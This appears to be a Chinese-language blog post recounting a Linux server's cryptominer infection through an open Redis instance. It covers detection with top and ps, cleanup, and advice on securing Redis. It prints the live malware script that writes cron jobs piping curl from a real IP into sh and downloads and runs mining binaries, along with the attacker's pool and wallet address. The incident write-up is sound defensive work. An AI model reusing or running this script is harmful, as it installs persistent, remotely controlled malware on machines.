今天登入伺服器感覺伺服器特別的慢。結果檢視發現有兩個程序佔用CPU100%了，一個是minerd一個是wnTKYg。如果大家遇到請小心。

• 檢視伺服器各個程式佔用資源量

[root@iZ2zeayj54m6qs0689jm ~]# top
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                           
 1331 root      20   0  233m 5392 1076 S 99.8  0.1  58
 
:24.44 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8
 1406 root      20   0  223m 5032  704 S 98.8  0.1  54:42.39 /tmp/wnTKYg 
 #在顯示的時候按c鍵出現程式的路徑

或者按以下方式找出佔用記憶體大的程式路徑
[root@iZ2zeayj54m6qs0689jm ~]# ps -ef | grep minerd 
root      1331     1 99 12:46 ?        00:59:48 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr
 
.crypto-pool.fr:8080 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
root      2526  1339  0 13:46 pts/0    00:00:00 grep minerd

[root@iZ2zeayj54m6qs0689jm ~]# ps -ef | grep wnTKYg
root      1406     1 98 12:50 ?        00:56:50 /tmp/wnTKYg
root      2538  1339  0
 
 13:47 pts/0    00:00:00 grep wnTKYg

• 殺死佔用記憶體大的程式

[root@iZ2zeayj54m6qs0689jm opt]# kill -9 1406
[root@iZ2zeayj54m6qs0689jm opt]# kill -9 1331

• 然後根據檢視到的程式路徑，進入目錄內，將目錄裡的檔案刪除

[root@iZ2zeayj54m6qs0689jm ~]# cd /tmp/
[root@iZ2zeayj54m6qs0689jm tmp]# ls
Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>  duckduckgo.23.log  hsperfdata_root          wnTKYg
ddg.1001                                            dump.rdb           qtsingleapp-aegisG-46d2
[root@iZ2zeayj54m6qs0689jm tmp]# rm -rf ./*

[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/
KHK75NEOiq33  minerd        rh/           
[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/
[root@iZ2zeayj54m6qs0689jm opt]# ls
KHK75NEOiq33  minerd  rh
[root@iZ2zeayj54m6qs0689jm opt]# rm -rf ./*

• 之後檢查開機自動啟動或者定時任務裡是否有不正常自啟動和定時任務
  我中的病毒是寫在定時任務的一個任務。指向一個網站自動下載一個指令碼。我下下來看了下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?8 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?8 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.1001" ]; then
    curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoTKY()
{
    if [ ! -f "/tmp/wnTKYg" ]; then
        curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
    fi
    chmod +x /tmp/wnTKYg
    /tmp/wnTKYg
}

DoTKYnoAES()
{
    if [ ! -f "/tmp/wnTKYg.noaes" ]; then
        curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
    fi
    chmod +x /tmp/wnTKYg.noaes
    /tmp/wnTKYg.noaes
}


ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES

指令碼是這樣的，相信大家也都看懂啦。

• top等待檢視，看是否還會啟動程式。（我的也啟動了）如果啟動了，檢查剛才的步驟是不是沒做，如果都做了，就再次殺掉程式就好了。我的是一直沒發現問題。

  問題總結

• 這樣的病毒是直接遠端連線redis，一般redis都是root安裝的，連線redis也就掌握了root許可權，它可以往你的定時任務裡寫內容。

• 中這樣的病毒大多都是因為redis沒有設定密碼，存在著很大的安全漏洞，所以大家要設定redis密碼，並且更改redis的埠。安裝時最好別用root安裝。（後續會更新redis設定密碼，和連線java）
• 查了些資料看有人說這是在挖幣，wnTKYg是門羅幣，所以大家要注意伺服器的安全，別讓自己的資源讓別人用來掙錢。
-